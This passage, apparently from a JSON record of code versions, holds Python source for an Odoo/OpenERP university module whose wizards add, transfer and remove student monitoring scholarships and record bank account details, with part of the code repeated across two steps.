fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', status)]\"\n ), 'dados_bancarios_id': fields.many2one('ud.dados.bancarios',\n u'Dados Bancários', domain=[('id', '=', False)]), 'banco_id':\n fields.many2one('ud.banco', u'Banco', ondelete='restrict'),\n 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] 
= doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', 
uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 
'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = 
transf.doc_discente_id_para.discente_id.matricula\n            for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n                if perfil.matricula == matricula and perfil.tipo == 'a':\n                    if perfil.is_bolsista:\n                        raise osv.except_osv(u'Discente bolsista',\n                            u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n                            .format(transf.doc_discente_id_para.discente_id\n                            .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n                            tipo_bolsa]))\n                    break\n            if not perfil:\n                raise osv.except_osv(u'Perfil excluído', \n                    u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n                    % matricula or '')\n            matricula = transf.doc_discente_id_de.discente_id.matricula\n            for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n                if perfil_de.matricula == matricula and perfil_de.tipo == 'a':\n                    break\n            responsavel = self.pool.get('ud.employee').search(cr,\n                SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n            if not responsavel:\n                raise osv.except_osv(u'Registro Inexistente',\n                    u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n                    )\n            if len(responsavel) > 1:\n                raise osv.except_osv(u'Multiplos vínculos',\n                    u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n                    )\n            valor = perfil_de.valor_bolsa\n            perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n                True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n            perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n                'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n                False})\n            transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n            transf.doc_discente_id_para.write({'state': 'bolsista',\n                'is_active': True})\n            get_banco(self, cr, transf, transf.doc_discente_id_para.\n                discente_id.pessoa_id.id, context)\n            evento = {'responsavel_id': responsavel[0], 'name':\n                u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n                doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n                doc_discente_id_para.discente_id.pessoa_id.id)],\n                'descricao': \n                u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula \"%(matricula_para)s\".'\n                % {'valor': valor, 'discente_de': transf.\n                doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n                'matricula_de': perfil_de.matricula, 'discente_para':\n                transf.doc_discente_id_para.discente_id.pessoa_id.name.upper(\n                ), 'matricula_para': perfil.matricula}}\n            transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n        return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n    _name = 'ud.monitoria.bolsa.remover.wizard'\n    _description = u'Remoção de bolsa de discente'\n    _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n        u'Semestre', required=True, readonly=True), 'curso_id': fields.\n        many2one('ud.curso', u'Curso', required=True, domain=\n        \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n        'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n        \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n        'doc_discente_id': fields.many2one(\n        'ud.monitoria.documentos.discente', u'Discente', required=True,\n        domain=\n        \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n        )}\n\n    def default_get(self, cr, uid, fields_list, context=None):\n        res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n            fields_list, context)\n        context = context or {}\n        if context.get('active_id', False):\n            if 
context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-4": "<mask token>\nTIPOS_BOLSA = dict(_TIPOS_BOLSA)\n\n\ndef get_banco(cls, cr, browse_record, usuario_id, context=None):\n dados_bancarios_model = cls.pool.get('ud.dados.bancarios')\n args = [('banco_id', '=', browse_record.banco_id.id)]\n if browse_record.agencia_v:\n args.append(('agencia', '=', browse_record.agencia))\n if browse_record.dv_agencia_v:\n args.append(('dv_agencia', '=', browse_record.dv_agencia))\n if browse_record.conta_v:\n args.append(('conta', '=', browse_record.conta))\n if browse_record.dv_conta_v:\n args.append(('dv_conta', '=', browse_record.dv_conta))\n if browse_record.operacao_v:\n args.append(('operacao', '=', browse_record.operacao))\n dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args,\n context=context)\n if dados_bancarios:\n dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID,\n dados_bancarios[0])\n if not dados_bancarios.ud_conta_id:\n return dados_bancarios.id\n elif dados_bancarios.ud_conta_id.id == usuario_id:\n return dados_bancarios.id\n raise osv.except_osv(u'Dados Bancários duplicados',\n u'Outra pessoa já possui esses dados bancários!')\n dados = {'banco_id': browse_record.banco_id.id, 'agencia':\n browse_record.agencia, 'dv_agencia': browse_record.dv_agencia,\n 'conta': browse_record.conta, 'dv_conta': browse_record.dv_conta,\n 'operacao': browse_record.operacao, 'ud_conta_id': usuario_id}\n return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=\n context)\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.adicionar.wizard'\n _description = u'Inclusão de bolsa de monitoria para discente (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), ('is_active', '=', True)]\"\n ), 'bolsas': fields.function(_bolsas, type='integer', string=\n u'Bolsas disponíveis', help=\n u'Número de bolsas disponíveis para a disciplina'), 'valor_bolsa':\n fields.float(u'Bolsa (R$)'), 'tutor': fields.boolean(u'Tutor?'),\n 'status': fields.selection(_STATES, u'Status', required=True),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', status)]\"\n ), 'dados_bancarios_id': fields.many2one('ud.dados.bancarios',\n u'Dados Bancários', domain=[('id', '=', False)]), 'banco_id':\n fields.many2one('ud.banco', u'Banco', ondelete='restrict'),\n 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n 
related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = 
self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 
